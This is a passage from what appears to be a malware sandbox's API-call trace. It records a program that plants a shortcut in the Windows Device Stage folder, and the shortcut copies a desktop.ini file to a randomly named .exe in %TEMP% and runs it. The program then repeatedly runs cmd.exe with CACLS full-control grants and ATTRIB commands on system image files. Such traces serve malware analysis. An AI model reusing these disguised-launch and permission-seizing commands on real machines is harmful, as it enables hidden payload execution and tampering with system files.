\"{113527a4-45d4-4b6f-b567-97838f1b04b0}\" & type \"{113527a4-45d4-4b6f-b567-97838f1b04b0}\\desktop.ini\" > \"%TEMP%\\w6AbRsJq.exe\" && \"%TEMP%\\w6AbRsJq.exe\"") returned 0x0 [0147.935] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 
[0147.935] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0147.935] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0147.935] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}.lnk", fRemember=0) returned 0x0 [0147.945] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0147.945] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0147.945] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0147.945] CoUninitialize () [0147.946] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0147.946] ReleaseMutex (hMutex=0xf8) returned 1 [0147.946] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0147.946] ReleaseMutex (hMutex=0xf8) returned 1 [0147.946] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0147.946] ReleaseMutex (hMutex=0xf8) returned 1 [0147.946] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0147.946] ReleaseMutex (hMutex=0xf8) returned 1 [0147.946] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0147.947] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png", lpFilePart=0x12eab4*="device.png") returned 
0x62 [0147.947] GetLastError () returned 0x5 [0147.947] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0147.947] LocalFree (hMem=0x1c6cc8) returned 0x0 [0147.947] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0147.947] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0147.947] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0147.947] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0147.947] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0147.947] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0147.947] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), 
lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png\"", lpProcessInformation=0x12fba4*(hProcess=0x110, hThread=0x114, dwProcessId=0xa3c, dwThreadId=0xadc)) returned 1 [0147.949] WaitForSingleObject (hHandle=0x110, dwMilliseconds=0xffffffff) returned 0x0 [0148.471] CloseHandle (hObject=0x110) returned 1 [0148.471] CloseHandle (hObject=0x114) returned 1 [0148.471] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0148.471] ReleaseMutex (hMutex=0xf8) returned 1 [0148.472] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0148.472] ReleaseMutex (hMutex=0xf8) returned 1 [0148.472] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0148.472] ReleaseMutex (hMutex=0xf8) returned 1 [0148.472] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0148.472] ReleaseMutex (hMutex=0xf8) returned 1 [0148.472] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0148.472] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png", lpFilePart=0x12eab4*="device.png") 
returned 0x62 [0148.472] GetLastError () returned 0x5 [0148.472] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0148.472] LocalFree (hMem=0x1c6cc8) returned 0x0 [0148.472] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0148.472] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0148.472] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0148.473] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0148.473] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{113527A4-45D4-4B6F-B567-97838F1B04B0}\\") returned 0x58 [0148.473] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{113527A4-45D4-4B6F-B567-97838F1B04B0}\\") returned 0x58 [0148.473] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{113527A4-45D4-4B6F-B567-97838F1B04B0}\\", cchCount1=88, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{113527A4-45D4-4B6F-B567-97838F1B04B0}\\", cchCount2=88) returned 2 [0148.473] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0148.473] ReleaseMutex (hMutex=0xf8) returned 1 [0148.473] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0148.473] ReleaseMutex (hMutex=0xf8) returned 1 
[0148.473] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0148.473] ReleaseMutex (hMutex=0xf8) returned 1 [0148.473] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0148.473] ReleaseMutex (hMutex=0xf8) returned 1 [0148.473] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0148.473] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png", lpFilePart=0x12eab4*="overlay.png") returned 0x63 [0148.473] GetLastError () returned 0x5 [0148.473] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0148.473] LocalFree (hMem=0x1c6cc8) returned 0x0 [0148.473] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". 
%s") returned 0x19 [0148.473] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0148.474] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0148.474] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0148.474] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0148.474] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0148.474] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png\"", lpProcessInformation=0x12fba4*(hProcess=0x110, hThread=0x114, dwProcessId=0xb3c, dwThreadId=0xb04)) returned 1 [0148.476] WaitForSingleObject 
(hHandle=0x110, dwMilliseconds=0xffffffff) returned 0x0 [0148.847] CloseHandle (hObject=0x110) returned 1 [0148.847] CloseHandle (hObject=0x114) returned 1 [0148.847] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0148.847] ReleaseMutex (hMutex=0xf8) returned 1 [0148.847] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0148.847] ReleaseMutex (hMutex=0xf8) returned 1 [0148.847] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0148.847] ReleaseMutex (hMutex=0xf8) returned 1 [0148.847] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0148.847] ReleaseMutex (hMutex=0xf8) returned 1 [0148.847] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0148.848] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png", lpFilePart=0x12eab4*="overlay.png") returned 0x63 [0148.848] GetLastError () returned 0x5 [0148.848] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0148.848] LocalFree (hMem=0x1c6cc8) returned 0x0 [0148.848] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open 
file \"%s\". %s") returned 0x19 [0148.848] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0148.848] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0148.848] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0148.848] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{113527A4-45D4-4B6F-B567-97838F1B04B0}\\") returned 0x58 [0148.848] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{113527A4-45D4-4B6F-B567-97838F1B04B0}\\") returned 0x58 [0148.848] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{113527A4-45D4-4B6F-B567-97838F1B04B0}\\", cchCount1=88, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{113527A4-45D4-4B6F-B567-97838F1B04B0}\\", cchCount2=88) returned 2 [0148.848] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0148.848] ReleaseMutex (hMutex=0xf8) returned 1 [0148.848] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0148.848] ReleaseMutex (hMutex=0xf8) returned 1 [0148.848] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0148.849] ReleaseMutex (hMutex=0xf8) returned 1 [0148.849] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0148.849] ReleaseMutex (hMutex=0xf8) returned 1 [0148.849] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png" (normalized: "c:\\users\\all users\\microsoft\\device 
stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0148.902] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png", lpFilePart=0x12eab4*="superbar.png") returned 0x64 [0148.902] GetLastError () returned 0x5 [0148.902] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0148.902] LocalFree (hMem=0x1c6cc8) returned 0x0 [0148.902] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". 
%s") returned 0x19 [0148.902] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0148.903] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0148.903] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0148.903] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0148.903] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0148.903] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png\"", lpProcessInformation=0x12fba4*(hProcess=0x110, hThread=0x114, dwProcessId=0xb00, dwThreadId=0xc20)) returned 1 [0148.904] WaitForSingleObject 
(hHandle=0x110, dwMilliseconds=0xffffffff) returned 0x0 [0149.092] CloseHandle (hObject=0x110) returned 1 [0149.092] CloseHandle (hObject=0x114) returned 1 [0149.092] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0149.092] ReleaseMutex (hMutex=0xf8) returned 1 [0149.092] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0149.092] ReleaseMutex (hMutex=0xf8) returned 1 [0149.092] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0149.092] ReleaseMutex (hMutex=0xf8) returned 1 [0149.092] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0149.092] ReleaseMutex (hMutex=0xf8) returned 1 [0149.092] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0149.092] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png", lpFilePart=0x12eab4*="superbar.png") returned 0x64 [0149.092] GetLastError () returned 0x5 [0149.092] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0149.092] LocalFree (hMem=0x1c6cc8) returned 0x0 [0149.092] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot 
open file \"%s\". %s") returned 0x19 [0149.092] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0149.093] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0149.093] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0149.093] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{113527A4-45D4-4B6F-B567-97838F1B04B0}\\") returned 0x58 [0149.093] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\", cchLength=0x58 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{113527A4-45D4-4B6F-B567-97838F1B04B0}\\") returned 0x58 [0149.093] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{113527A4-45D4-4B6F-B567-97838F1B04B0}\\", cchCount1=88, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\DEVICE STAGE\\DEVICE\\{113527A4-45D4-4B6F-B567-97838F1B04B0}\\", cchCount2=88) returned 2 [0149.093] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0149.093] ReleaseMutex (hMutex=0xf8) returned 1 [0149.093] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0149.093] ReleaseMutex (hMutex=0xf8) returned 1 [0149.093] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0149.093] ReleaseMutex (hMutex=0xf8) returned 1 [0149.093] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0149.093] ReleaseMutex (hMutex=0xf8) returned 1 [0149.093] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png" (normalized: "c:\\users\\all users\\microsoft\\device 
stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0149.093] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png", lpFilePart=0x12eab4*="background.png") returned 0x66 [0149.093] GetLastError () returned 0x5 [0149.093] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0149.093] LocalFree (hMem=0x1c6cc8) returned 0x0 [0149.093] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". 
